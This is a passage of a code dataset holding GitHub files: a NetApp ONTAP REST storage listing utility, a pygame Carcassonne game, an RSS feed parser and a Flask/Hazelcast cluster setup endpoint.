svm_name)\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n volumesdict = dict(response.json())\r\n volumes = volumesdict['records']\r\n print()\r\n print(\"List of Volumes :- \")\r\n print(\"===================\")\r\n for volume in volumes:\r\n print(\r\n \"Volume Name :- %s; Volume UUID :- %s\" %\r\n (volume['name'], volume['uuid']))\r\n\r\n\r\ndef show_snapshot(\r\n svm_name: str,\r\n volume_name: str,\r\n cluster: str,\r\n headers_inc: str):\r\n \"\"\" list snapshots\"\"\"\r\n vol_uuid = get_key_volumes(svm_name, volume_name, cluster, headers_inc)\r\n print()\r\n print(\"Getting Snapshot Details\")\r\n print(\"========================\")\r\n snap_api_url = \"https://{}/api/storage/volumes/{}/snapshots\".format(\r\n cluster, vol_uuid)\r\n try:\r\n response = requests.get(\r\n snap_api_url,\r\n headers=headers_inc,\r\n verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n svmsdict = dict(response.json())\r\n svms = svmsdict['records']\r\n print()\r\n for svm in svms:\r\n print(svm['name'])\r\n return response.json()\r\n\r\n\r\ndef show_aggregate(cluster: str, headers_inc: str):\r\n \"\"\" list aggregates\"\"\"\r\n url = \"https://{}/api/storage/aggregates\".format(cluster)\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n tmp = dict(response.json())\r\n aggr = tmp['records']\r\n print()\r\n print(\"List of Aggregates:- \")\r\n print(\"=====================\")\r\n for i in aggr:\r\n print(\"Aggregate Name = %s \" % i['name'])\r\n print(\"Aggregate UUID = %s \" % i['uuid'])\r\n\r\n\r\ndef check_job_status(job_status: str, headers_inc: str, cluster: str):\r\n \"\"\" check job status\"\"\"\r\n if job_status['state'] == \"failure\":\r\n if job_status['code'] == 460770:\r\n print(\"SVM Already Exists\")\r\n else:\r\n print(\"Operation failed due to :{}\".format(job_status['message']))\r\n elif job_status['state'] == \"success\":\r\n print(\"Operation completed successfully.\")\r\n else:\r\n job_status_url = \"https://{}/api/cluster/jobs/{}\".format(\r\n cluster, job_status['uuid'])\r\n try:\r\n job_response = requests.get(\r\n job_status_url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n job_status = job_response.json()\r\n time.sleep(5)\r\n check_job_status(job_status, headers_inc, cluster)\r\n\r\n\r\ndef show_qtree(\r\n svm_name: str,\r\n volume_name: str,\r\n cluster: str,\r\n headers_inc: str):\r\n \"\"\" Show Qtree\"\"\"\r\n print()\r\n vol_uuid = get_key_volumes(svm_name, volume_name, cluster, headers_inc)\r\n print()\r\n print(\"Getting Qtree Details\")\r\n print(\"======================\")\r\n qtree_api_url = \"https://{}/api/storage/qtrees?volume.uuid={}\".format(\r\n cluster, vol_uuid)\r\n try:\r\n response = requests.get(\r\n qtree_api_url,\r\n headers=headers_inc,\r\n verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n qtreesdict = dict(response.json())\r\n qtrees = qtreesdict['records']\r\n print()\r\n print(\" List of Qtrees :- \")\r\n for qtree in qtrees:\r\n print(\"Qtree Name:-%s Qtree ID:-%s\" % (qtree['name'], qtree['id']))\r\n","repo_name":"NetApp/ontap-rest-python","sub_path":"examples/rest_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":21969,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"91"}
+{"seq_id":"21756983306","text":"import json\r\nimport random\r\nimport numpy as np\r\nimport os\r\nimport pygame as pg\r\n\r\npageSize = (1024, 576)\r\nimageScale = 50 #How much to scale distances buy so that they coincide with the size of tile sprites.\r\n\r\nclass Deck:\r\n\t#TODO:Need to add ability to set the first card in the deck to the starting tile.\r\n\tdef __init__(self, deckFile = \"decks/vanillaDeck.json\"):\r\n\t\t#TODO: we might be abel to get something similar to \"Deck.__init__\" in a more generic way using __name__ to get the function name.\r\n\t\tprint(\"Deck.__init__: Creating deck\")\r\n\t\twith open(deckFile, \"r\") as f:\r\n\t\t\tself.tileList = json.loads(f.read())\r\n\r\n\t\tself.deck = []\r\n\t\tself.nTiles = 0 #total number of tiles in deck.\r\n\t\tself.drawPos = 0\r\n\t\tfor tileName in self.tileList:\r\n\t\t\tamount = self.tileList[tileName]['amount']\r\n\t\t\ttileDict = self.tileList[tileName]['tileDict']\r\n\r\n\t\t\t#TODO: Can this be done in one line?\r\n\t\t\ttileCount = 0\r\n\t\t\tfor i in range(amount):\r\n\t\t\t\tself.deck.append(Tile(tileDict,tileName))\r\n\t\t\t\tself.nTiles += 1\r\n\t\t\t\ttileCount += 1\r\n\t\t\t\tprint(f\"{self.nTiles:3d} {tileCount:3d} {tileName} loaded\")\r\n\t\tprint(\"\")\r\n\r\n\tdef shuffle(self, resetDrawPos = True, firstTile = \"startingTile\"):\r\n\t\tif firstTile is None:\r\n\t\t\tprint(\"Deck.shuffle: Shuffling deck\")\r\n\t\t\trandom.shuffle(self.deck)\r\n\t\telse:\r\n\t\t\tif firstTile in self.tileList:\r\n\t\t\t\tprint(f\"Deck.shuffle: Shuffling deck with {firstTile} as first tile.\")\r\n\t\t\t\tself.deck = []\r\n\t\t\t\tfor tileName in self.tileList:\r\n\t\t\t\t\tif firstTile == tileName:\r\n\t\t\t\t\t\tamount = self.tileList[tileName]['amount']-1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tamount = self.tileList[tileName]['amount']\r\n\t\t\t\t\ttileDict = self.tileList[tileName]['tileDict']\r\n\r\n\t\t\t\t\tself.deck = self.deck + [Tile(tileDict,tileName) for i in range(amount)]\r\n\r\n\t\t\t\trandom.shuffle(self.deck)\r\n\t\t\t\tself.deck.insert(0,Tile(self.tileList[firstTile]['tileDict'],firstTile))\r\n\t\t\telse:\r\n\t\t\t\tprint(f\"Deck.shuffle: Unable to find {firstTile}. Shuffling normally.\")\r\n\t\t\t\trandom.shuffle(self.deck)\r\n\r\n\t\tif resetDrawPos:\r\n\t\t\tprint(\"Deck.shuffle: resetting draw position.\")\r\n\t\t\tself.drawPos = 0\r\n\r\n\tdef draw(self):\r\n\t\tif self.drawPos < self.nTiles:\r\n\t\t\tnewTile = self.deck[self.drawPos]\r\n\t\t\tself.drawPos += 1\r\n\t\t\tprint(f\"Deck.draw: Drew a {newTile.tileName} tile.\")\r\n\t\t\treturn newTile\r\n\t\telse:\r\n\t\t\tprint(\"Deck.draw: Reached end of deck.\")\r\n\t\t\treturn None\r\n\r\n\tdef printTileList(self):\r\n\t\tprint(\"Deck.printTileList: Deck tile list:\")\r\n\t\tfor tileName in self.tileList:\r\n\t\t\tprint(f\"{tileName} x{self.tileList[tileName]['amount']}\")\r\n\t\t\t# print(self.tileList[tile]['tileDict'],\"\\n\")\r\n\t\t\tfor feature in self.tileList[tileName]['tileDict']:\r\n\t\t\t\tprint(f\" {feature}\")\r\n\t\t\t\tfor i in self.tileList[tileName]['tileDict'][feature]:\r\n\t\t\t\t\tprint(f\" {i}\")\r\n\t\tprint(\"\")\r\n\r\n\tdef printDeck(self, style = \"pretty\"):\r\n\t\tprint(\"Deck.printDeck: Deck contents in order:\")\r\n\t\t#print(self.deck) #prints dict obj locations\r\n\t\tfor tile in self.deck:\r\n\t\t\ttile.tileInfo(style = \"pretty\")\r\n\t\t\t\r\n\r\n\r\n\r\nclass Tile:\r\n\t\"\"\"\r\n\tcarcosonne tiles are defined by their edges and center. The edges can be roads, cities, or fields. The centers can be monasteries, crossroads, or city entrances. Expansions can introduce other edges or centers. We call these parts of the tile \"features\"\r\n\r\n\tYou can divide the tiles edges into 12 portions (the center being a 13 portion). We represent this using a 13-element array of strings. For example the starting tile would be:\r\n\r\n\t\tself.sides = [city,city,city,field,road,field,field,field,road,field,None]\r\n\r\n\tthe last element of the list represents the center portion of the tile. None indicates that there is no special center to the tile.\r\n\r\n\tThis representation allows for easy accessing for tile compatibility checks, but does not encode how tile elements (roads,cities, etc) are connected. To store this information we keep a dictionary of the contents of the tile. Each dictionary entry will be a 2-d nested list. Each each element will be a list of integers indicating which of the edge are connected. For example the starting tile would be:\r\n\r\n\t\tself.tileDict = {cities: [[0,1,2]], roads: [[10,4]], fields: [[11,3],[9,8,7,6,5]], monastery: [], cityEntrance: [], crossroad: []}\r\n\r\n\t\tTODO: Would a list of sets be better? Should we combine the center entrys (monastery,cityEntrance,etc.) into just one entry called \"center\" or something?\r\n\t\"\"\"\r\n\r\n\tdef __init__(self, tileDictInput,tileNameInput, imageDir=\"sprites/tileImages\"):\r\n\r\n\t\t#TODO: This allows for portions of the tiles to overwritten and for some portions of the tile to remain undefined. Undefined edges will likely also be unrepresented in \r\n\t\t\r\n\t\tself.sides = [\"None\" for i in range(13)] \r\n\t\tfor feature in tileDictInput:\r\n\t\t\tfor i in tileDictInput[feature]:\r\n\t\t\t\tfor j in i:\r\n\t\t\t\t\tself.sides[j] = feature \r\n\r\n\t\tself.tileDict = tileDictInput\r\n\t\tself.tileName = tileNameInput\r\n\t\tself.neighbors = [None,None,None,None] #tile objects to the top, right, bottom, left sides of this tile in clockwise order\r\n\t\tself.printStyles = [\"pretty\",\"verbose\"]\r\n\t\tself.pos = None #this will become a 3d numpy integer array. The first two number will indicate the x,y position. The last digit will indicate the orientation of the tile (either 0,1,2,3 corresponding to rotating the tile 90 degrees clockwise)\r\n\t\tself.orient = 0 #Will be an integer to indicate the orientation of the tile (either 0,1,2,3 corresponding to rotating the tile 90 degrees clockwise)\r\n\r\n\t\tself.tileImage = pg.image.load(os.path.join(imageDir, self.tileName)+\".png\").convert()\r\n\t\tself.tileImage = pg.transform.scale(self.tileImage, (imageScale, imageScale))\r\n\t\tself.tileImageRect = self.tileImage.get_rect()\r\n\r\n\tdef tileInfo(self, style = \"pretty\"):\r\n\r\n\t\tif style == \"pretty\":\r\n\t\t\tprint(self.tileName)\r\n\t\t\tfor feature in self.tileDict:\r\n\t\t\t\tprint(f\" {feature}\")\r\n\t\t\t\tfor i in self.tileDict[feature]:\r\n\t\t\t\t\tprint(f\" {i}\")\r\n\t\t\tprint(\"\")\r\n\t\telif style == \"verbose\":\r\n\t\t\tprint(\"self.tileDict = \",self.tileDict)\r\n\t\t\tprint(\"self.sides = \",self.sides)\r\n\t\t\tprint(\"self.neighbors = \",self.neighbors, \"\\n\")\r\n\t\telse:\r\n\t\t\tprint(f\"invalid style: {style}\")\r\n\t\t\tprint(f\"valid print styles {self.printStyles}\")\r\n\r\n\tdef visualizeTile(self,style = \"image\" , vpos = (0,0)):\r\n\r\n\t\tif style == \"text\":\r\n\t\t\ts = [side[0] for side in self.sides] #first letter of each side feature.\r\n\t\t\tprint(\" ____________\",\"\\n\",\r\n\t\t\t \"| \\ 0| 1 |2 /|\",\"\\n\",\r\n\t\t\t \"|11\\ | | /3|\",\"\\n\",\r\n\t\t\t \"|___\\|___|/__|\",\"\\n\",\r\n\t\t\t \"| | | |\",\"\\n\",\r\n\t\t\t \"|10 | | 4|\",\"\\n\",\r\n\t\t\t \"|____|___|___|\",\"\\n\",\r\n\t\t\t \"| /| |\\ |\",\"\\n\"\r\n\t\t\t \" | 9/ | | \\\\5|\",\"\\n\",\r\n\t\t\t \"|_/_8|_7_|6_\\|\")\r\n\r\n\t\t\tprint(\" ____________________\",\"\\n\",\r\n\t\t\t \"| \\ \",s[0],\"| \",s[1],\" |\" ,s[2],\"/ |\",\"\\n\",\r\n\t\t\t \"|\" ,s[11],\"\\ | | /\" ,s[3],\"|\",\"\\n\",\r\n\t\t\t \"|____\\__|_____|_/____|\",\"\\n\",\r\n\t\t\t \"| | | |\",\"\\n\",\r\n\t\t\t \"|\" ,s[10],\" | \",s[12],\" | \",s[4],\"|\",\"\\n\",\r\n\t\t\t \"|____|__________|____|\",\"\\n\",\r\n\t\t\t \"| / | | \\ |\",\"\\n\"\r\n\t\t\t \" |\",s[9],\"/ | | \\\\\" ,s[5],\"|\",\"\\n\",\r\n\t\t\t \"|__/_\",s[8],\"|_\",s[7],\"_|\" ,s[6],\"\\__|\")\r\n\t\telif style == \"image\":\r\n\t\t\tif self.pos is None:\r\n\t\t\t\twindow.blit(self.tileImage, self.tileImageRect)\r\n\t\t\t\tpg.display.update()\r\n\t\t\telse:\r\n\t\t\t\twindow.blit(self.tileImage, tuple(self.pos))\r\n\t\t\t\tpg.display.update()\r\n\t\telse:\r\n\t\t\tprint(f\"invalid style: {style}\")\r\n\r\n\tdef rotateTile(self):\r\n\t\tif self.orient < 3:\r\n\t\t\tself.orient += 1\r\n\t\telse:\r\n\t\t\tself.orient = 0\r\n\r\n\t\tself.tileImage = pg.transform.rotate(self.tileImage, -90)\r\n\t\tself.visualizeTile(style=\"image\")\r\n\t\tprint(f\"Tile.rotateTile: rotating tile to {self.orient}.\")\r\n\r\nclass Map:\r\n\t\"\"\"\r\n\tThe map is a collection of tiles\r\n\t\"\"\"\r\n\tdef __init__(self, startingTile, mapCenter = np.array([0,0])):\r\n\t\tprint(f\"Map.__init__: building Map with {startingTile.tileName} as first tile.\")\r\n\t\tself.mapElements = [startingTile]\r\n\t\tstartingTile.pos = mapCenter\r\n\t\tstartingTile.orient = 0\r\n\t\tself.ordDirs = imageScale * np.array([[0, -1], [1, 0], [0, 1], [-1, 0]])\r\n\t\tself.validPositions = self.ordDirs + mapCenter #ordDirs, short for ordinal directions specifcy relative positions up, right, down, left (going clockwise) or a given location\r\n\t\tprint(\"\")\r\n\r\n\tdef getValidPositions(self):\r\n\t\tprint(\"Map.getValidPositions: Creating new valid positions array\")\r\n\t\tself.validPositions = []\r\n\t\tfor tile in self.mapElements:\r\n\t\t\tif tile.neighbors[0] is None: #top\r\n\t\t\t\t#print(f\"Map.getValidPositions: top added\")\r\n\t\t\t\tself.validPositions.append(tile.pos + self.ordDirs[0])\r\n\t\t\tif tile.neighbors[1] is None: #right\r\n\t\t\t\t#print(f\"Map.getValidPositions: right added\")\r\n\t\t\t\tself.validPositions.append(tile.pos + self.ordDirs[1])\r\n\t\t\tif tile.neighbors[2] is None: #bottom\r\n\t\t\t\t#print(f\"Map.getValidPositions: bottom added\")\r\n\t\t\t\tself.validPositions.append(tile.pos + self.ordDirs[2])\r\n\t\t\tif tile.neighbors[3] is None: #left\r\n\t\t\t\t#print(f\"Map.getValidPositions: left added\")\r\n\t\t\t\tself.validPositions.append(tile.pos + self.ordDirs[3])\r\n\r\n\tdef validPosition(self,pos):\r\n\t\tfor validPos in self.validPositions:\r\n\t\t\tif np.array_equal(pos,validPos):\r\n\t\t\t\tprint(f\"Map.validPosition: {pos} is a valid position.\")\r\n\t\t\t\treturn True\r\n\t\treturn False\r\n\r\n\tdef getNeighbors(self,pos):\r\n\t\tprint(f\"Map.getNeighbors: Getting neighbors of pos {pos}\")\r\n\t\tneighborsPos = pos + self.ordDirs\r\n\t\t#print(f\"Map.getNeighbors: {neighborsPos[0]} {neighborsPos[1]} {neighborsPos[2]} {neighborsPos[3]}\")\r\n\t\tneighbors = [None for i in range(4)]\r\n\t\tfor tile in self.mapElements:\r\n\t\t\tfor i in range(len(neighborsPos)):\r\n\t\t\t\tif np.array_equal(tile.pos,neighborsPos[i]):\r\n\t\t\t\t\tneighbors[i] = tile\r\n\t\treturn neighbors\r\n\r\n\tdef validOrientationSingle(self, newTile, oldTile, ordDir):\r\n\t\t#Get orientation\r\n\t\tnewTileOrient = newTile.orient\r\n\t\toldTileOrient = oldTile.orient\r\n\r\n\t\tnewTileSides = [i for i in range(12)]\r\n\t\tfor i in range(newTileOrient):\r\n\t\t\tnewTileSides = newTileSides[-3:] + newTileSides[:-3]\r\n\r\n\t\toldTileSides = [i for i in range(12)]\r\n\t\tfor i in range(oldTileOrient):\r\n\t\t\toldTileSides = oldTileSides[-3:] + oldTileSides[:-3]\r\n\r\n\t\tif np.array_equal(ordDir,self.ordDirs[0]):\r\n\t\t\tnewTileIndicies = newTileSides[:3]\r\n\t\t\toldTileIndicies = oldTileSides[6:9]\r\n\t\telif np.array_equal(ordDir,self.ordDirs[1]):\r\n\t\t\tnewTileIndicies = newTileSides[3:6]\r\n\t\t\toldTileIndicies = oldTileSides[9:]\r\n\t\telif np.array_equal(ordDir,self.ordDirs[2]):\r\n\t\t\tnewTileIndicies = newTileSides[6:9]\r\n\t\t\toldTileIndicies = oldTileSides[:3]\r\n\t\telse:\r\n\t\t\tnewTileIndicies = newTileSides[9:]\r\n\t\t\toldTileIndicies = oldTileSides[3:6]\r\n\r\n\t\tnewTileFeatures = [newTile.sides[i] for i in newTileIndicies]\r\n\t\toldTileFeatures = [oldTile.sides[i] for i in oldTileIndicies]\r\n\t\toldTileFeatures.reverse()\r\n\r\n\t\t#print(\"Map.validOrientationSingle: newTileFeatures \", newTileFeatures)\r\n\t\t#print(\"Map.validOrientationSingle: newTileIndicies \", newTileIndicies)\r\n\t\t#print(\"Map.validOrientationSingle: oldTileFeatures \", oldTileFeatures)\r\n\t\t#print(\"Map.validOrientationSingle: oldTileIndicies \", oldTileIndicies)\r\n\t\t#print(\"\")\r\n\r\n\t\tif newTileFeatures == oldTileFeatures:\r\n\t\t\tprint(f\"Map.validOrientationSingle: {ordDir} is valid direction given orientation.\")\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tprint(f\"Map.validOrientationSingle: {ordDir} is not a valid direction given orientation.\")\r\n\t\t\treturn False\r\n\r\n\tdef validOrientation(self, newTile, neighbors):\r\n\t\t#TODO: range(len(neighbors)) will probably always be 4. Should I hard code it?\r\n\t\tfor i in range(len(neighbors)):\r\n\t\t\tif neighbors[i] is not None:\r\n\t\t\t\tif not self.validOrientationSingle(newTile, neighbors[i], self.ordDirs[i]):\r\n\t\t\t\t\tprint(f\"Map.validOrientation: {newTile.orient} is not a valid orientation.\")\r\n\t\t\t\t\treturn False\r\n\t\tprint(f\"Map.validOrientation: {newTile.orient} is a valid orientation.\")\r\n\t\treturn True\r\n\r\n\tdef updateNeighbors(self, newTile, neighborsInput):\r\n\t\tprint(f\"Updating neighbor information for {newTile.tileName} and its neighbors.\")\r\n\t\tnewTile.neighbors = neighborsInput\r\n\t\tfor i in range(len(neighborsInput)):\r\n\t\t\tj = i + 2\r\n\t\t\tif j >= 4:\r\n\t\t\t\tj -= 4\r\n\t\t\tif neighborsInput[i] is not None:\r\n\t\t\t\tneighborsInput[i].neighbors[j] = newTile\r\n\r\n\tdef addTile(self, newTile, pos, orient):\r\n\t\tprint(f\"Map.addTile: Trying to add {newTile.tileName} at {pos} with orient {orient}.\")\r\n\t\tnewTile.pos = pos\r\n\t\tnewTile.orient = orient\r\n\t\tif self.validPosition(pos):\r\n\t\t\tneighbors = self.getNeighbors(pos)\r\n\t\t\tif self.validOrientation(newTile,neighbors):\r\n\t\t\t\tprint(f\"Map.addTile: Adding {newTile.tileName} to the map.\")\r\n\t\t\t\tself.mapElements.append(newTile)\r\n\t\t\t\tself.updateNeighbors(newTile, neighbors)\r\n\t\t\t\tself.getValidPositions() #This recreates the list of valid positions.\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tprint(f\"Map.addTile: Could not add {newTile.tileName} to the map.\")\r\n\t\t\t\tnewTile.pos = (0,0)\r\n\t\t\t\treturn False\r\n\t\telse:\r\n\t\t\tprint(f\"Map.addTile: Could not add {newTile.tileName} to the map.\")\r\n\t\t\tnewTile.pos = (0,0)\r\n\t\t\treturn False\r\n\r\n\tdef visualizeMap(self):\r\n\t\tprint(\"Map.visualizeMap: Creating map visualization.\")\r\n\t\tfor tile in self.mapElements:\r\n\t\t\ttile.visualizeTile()\r\n\r\n\tdef score(self):\r\n\t\tprint(\"Map.score: This is the score.\")\r\n\r\nclass Button:\r\n\r\n\tdef __init__(self, imageDir = os.path.join(os.getcwd(),\"sprites/marker.png\"), pos = None):\r\n\t\tprint(f\"Button.__init__: creating button at {pos}\")\r\n\t\tself.pos = pos\r\n\t\tself.buttonImage = pg.image.load(imageDir).convert()\r\n\t\tself.buttonImage = pg.transform.scale(self.buttonImage, (imageScale, imageScale))\r\n\t\tself.buttonRect = self.buttonImage.get_rect()\r\n\t\tself.buttonRect.left = pos[0] #+ self.buttonRect.width/2\r\n\t\tself.buttonRect.top = pos[1] #+ self.buttonRect.height/2\r\n\r\n\tdef mouseOverButton(self, mouse):\r\n\t\t(mouseX, mouseY) = mouse\r\n\t\t[left, top, width, height] = [i for i in self.buttonRect]\r\n\t\txMin = left\r\n\t\txMax = left + width\r\n\t\tyMin = top\r\n\t\tyMax = top + height\r\n\t\tif xMin <= mouseX <= xMax and yMin <= mouseY <= yMax:\r\n\t\t\tprint(f\"Button.{self.mouseOverButton.__name__}: Button at {np.array(mouse)} selected.\")\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\t#print(f\"Button.{self.mouseOverButton.__name__}: False\")\r\n\t\t\treturn False\r\n\r\n\tdef visualizeButton(self):\r\n\t\tif self.pos is None:\r\n\t\t\twindow.blit(self.buttonImage, self.buttonRect)\r\n\t\t\tpg.display.update()\r\n\t\telse:\r\n\t\t\twindow.blit(self.buttonImage, tuple(self.pos))\r\n\t\t\tpg.display.update()\r\n\r\nif __name__ == '__main__':\r\n\r\n\tpg.init() #What does this do? :^)\r\n\twindow = pg.display.set_mode(pageSize) #Make a window object?What toher args are there?\r\n\tclock = pg.time.Clock()\r\n\r\n\tdeck = Deck() #load deck from file and intilize draw deck of tiles\r\n\tdeck.shuffle() #shuffle the draw deck\r\n\t#print(\"page center: \", np.array(window.get_rect().center))\r\n\ttileMap = Map(deck.draw(),np.array(window.get_rect().center)) #create the map or gameboard where tiles are played\r\n\r\n\t#This is the draw cycle where tiles are repeatedly drawn and placed\r\n\tfor i in range(deck.nTiles -1):\r\n\t\tprint(f\"\\nTurn {i}\")\r\n\r\n\t\tbuttons = [Button(imageDir=os.path.join(os.getcwd(), \"sprites/squareMarker.png\"), pos=validPosition) for validPosition in tileMap.validPositions] # Create a button for each valid position\r\n\t\tfor button in buttons: button.visualizeButton()\r\n\t\ttileMap.visualizeMap()\r\n\r\n\t\tnewTile = deck.draw()\r\n\t\t#newTile.tileInfo()\r\n\t\tnewTile.visualizeTile(style=\"image\")\r\n\t\ttileAdded = False\r\n\r\n\t\t#print(f\"Valid positions are: \\n{tileMap.validPositions}\")\r\n\t\twhile not tileAdded:\r\n\t\t\tclock.tick(7.5) # frames to render /second TODO: Does this need to go here?\r\n\t\t\tselectedButtonPos = None\r\n\t\t\tfor ev in pg.event.get():\r\n\t\t\t\tif ev.type == pg.QUIT:\r\n\t\t\t\t\tpg.quit()\r\n\t\t\t\telif ev.type == pg.KEYDOWN:\r\n\t\t\t\t\tif ev.key == pg.K_r:\r\n\t\t\t\t\t\tnewTile.rotateTile()\r\n\t\t\t\telif ev.type == pg.MOUSEBUTTONDOWN:\r\n\t\t\t\t\tmouse = pg.mouse.get_pos()\r\n\t\t\t\t\tfor button in buttons:\r\n\t\t\t\t\t\tif button.mouseOverButton(mouse):\r\n\t\t\t\t\t\t\tnewPos = button.pos\r\n\t\t\t\t\t\t\ttileAdded = tileMap.addTile(newTile, newPos, newTile.orient)\r\n\t\t\t\t\t\t\tbreak\r\n\r\n\r\n\r\n\r\n\r\n\t\t\t# userInput = input(\"Provide location and orientation as [x,y,o]: \")\r\n\t\t\t# print(\"\")\r\n\t\t\t# try:\r\n\t\t\t# \tuserInputParsed = eval(userInput)\r\n\t\t\t# \tnewPos = np.array(userInputParsed[:2])\r\n\t\t\t# \tnewOrient = userInputParsed[2]\r\n\t\t\t# \ttileAdded = tileMap.addTile(newTile, newPos, newOrient)\r\n\t\t\t# \tprint(\"\")\r\n\t\t\t# \tbreak\r\n\t\t\t# except:\r\n\t\t\t# \tprint(f\"__main__: could not parse user input.\")\r\n\t\t\t# \tprint(\"\")\r\n\r\npg.quit()\r\n\r\n# class road:\r\n# \tdef __init__(self, owner = None):\r\n# \t\tprint(\"Creating road\")\r\n# \t\tself.owner = owner\r\n\r\n# class city:\r\n# \tdef __init__(self, owner = None):\r\n# \t\tprint(\"Creating city\")\r\n# \t\tself.owner = owner\r\n\r\n# class field:\r\n# \tdef __init__(self, owner = None):\r\n# \t\tprint(\"Creating field\")\r\n# \t\tself.owner = owner","repo_name":"mqjg/Carcassonne","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"40848319578","text":"def extractIwilltakeresponsibilityWordpressCom(item):\n\t'''\n\tParser for 'iwilltakeresponsibility.wordpress.com'\n\t'''\n\n\tvol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])\n\tif not (chp or vol) or \"preview\" in item['title'].lower():\n\t\treturn None\n\n\ttagmap = [\n\t\t('refuse to marry the demon emperor: lure and pamper the adorkable concubine', 'refuse to marry the demon emperor: lure and pamper the adorkable concubine', 'translated'),\n\t\t('PRC', 'PRC', 'translated'),\n\t\t('Loiterous', 'Loiterous', 'oel'),\n\t]\n\n\tfor tagname, name, tl_type in tagmap:\n\t\tif tagname in item['tags']:\n\t\t\treturn buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)\n\n\n\treturn False","repo_name":"fake-name/ReadableWebProxy","sub_path":"WebMirror/management/rss_parser_funcs/feed_parse_extractIwilltakeresponsibilityWordpressCom.py","file_name":"feed_parse_extractIwilltakeresponsibilityWordpressCom.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"91"}
+{"seq_id":"74674237102","text":"import os\nimport uuid\nimport logging\nimport time\n\nfrom flask import (\n Blueprint, jsonify, request\n)\nfrom psycopg2 import connect\nfrom project import db\nfrom project.api.models import Port, Host, EP, RoutingRule, ArionGatewayCluster, ArionNode, VPC\nfrom project.api.settings import node_ips, vnis, hazelcast_ip_port\nfrom project.api.utils import ip_to_int, mac_to_int\nfrom project import db\nimport hazelcast\nfrom project.api.zgcs import set_up_cluster_from_hazelcast\nfrom project.api.vpcs import set_up_vpc_from_hazelcast\nfrom project.api.nodes import set_up_node_from_hazelcast\nfrom project.api.ports import set_up_ports_in_the_same_vpc_from_hazelcast\n\nlogger = logging.getLogger()\n\n# used in creating the hazelcast client, add more elements to the inner map when there is a new added class, the key is the class_id.\nglobal hazelcast_serialization_factory\nhazelcast_serialization_factory = {1: {1: RoutingRule, 2: ArionGatewayCluster, 3: ArionNode, 4:VPC}}\n\nhazelcast_client = None\n\narion_gateway_cluster_map = None\n\nrouting_rule_map = None\n\narion_nodes_map = None\n\nvpc_map = None\n\ndefault_setup_blueprint = Blueprint('default_setup', __name__)\n\n# setup a default zgc cluster with data GET from Hazelcast\n@default_setup_blueprint.route('/default_setup', methods=['GET'])\ndef setup():\n logger.debug(f'Start getting data from Hazelcast')\n\n use_arion_agent_parameter = request.args.get(\"use_arion_agent\", default=None, type=lambda v: v.lower() == 'true')\n\n\n get_data_start_time = time.time()\n connect_to_hazelcast(hazelcast_ip_port)\n\n arion_gateway_cluster_set = arion_gateway_cluster_map.entry_set().result()\n logger.debug(f'GOT {len(arion_gateway_cluster_set)} ArionGatewayClusters from Hazelcast')\n\n arion_nodes_set = arion_nodes_map.entry_set().result()\n logger.debug(f'GOT {len(arion_nodes_set)} ArionNodes from Hazelcast')\n\n vpc_set = vpc_map.entry_set().result()\n logger.debug(f'GOT {len(vpc_set)} VPCs from Hazelcast')\n\n routing_rule_set = routing_rule_map.entry_set().result()\n logger.debug(f'GOT {len(routing_rule_set)} RoutingRules from Hazelcast')\n\n get_data_end_time = time.time()\n logger.debug(f'Finished getting data from Hazelcast, it took {get_data_end_time - get_data_start_time} seconds, now start setting up with the data.')\n\n for cluster_key, cluster in arion_gateway_cluster_set:\n set_up_cluster_from_hazelcast(cluster)\n time.sleep(10)\n\n for node_key, node in arion_nodes_set:\n set_up_node_from_hazelcast(node)\n time.sleep(10)\n\n for vpc_key, vpc_value in vpc_set:\n current_vpc : VPC = vpc_value\n vpc_response = set_up_vpc_from_hazelcast(current_vpc)\n response_object = vpc_response[\"gws\"]\n routing_rules_in_current_vpc = []\n print(f'Current VPC vni: {current_vpc.vni}')\n time.sleep(10)\n if use_arion_agent_parameter == False:\n for routing_rule_key, routing_rule_value in routing_rule_set:\n rule: RoutingRule = routing_rule_value\n if rule.vni == current_vpc.vni:\n routing_rules_in_current_vpc.append(rule)\n set_up_ports_in_the_same_vpc_from_hazelcast(routing_rules_in_current_vpc, current_vpc.vpc_id)\n time.sleep(10)\n else:\n print(f'user_arion_agent={use_arion_agent_parameter}, thus not setting up ports in this call.')\n\n\n setup_finish_time = time.time()\n\n logger.debug(f'Finished setting up, it took {setup_finish_time - get_data_end_time} seconds..')\n\n return jsonify(response_object), 201\n\ndef connect_to_hazelcast(hazelcast_ip_port):\n global hazelcast_client\n hazelcast_client = hazelcast.HazelcastClient(\n 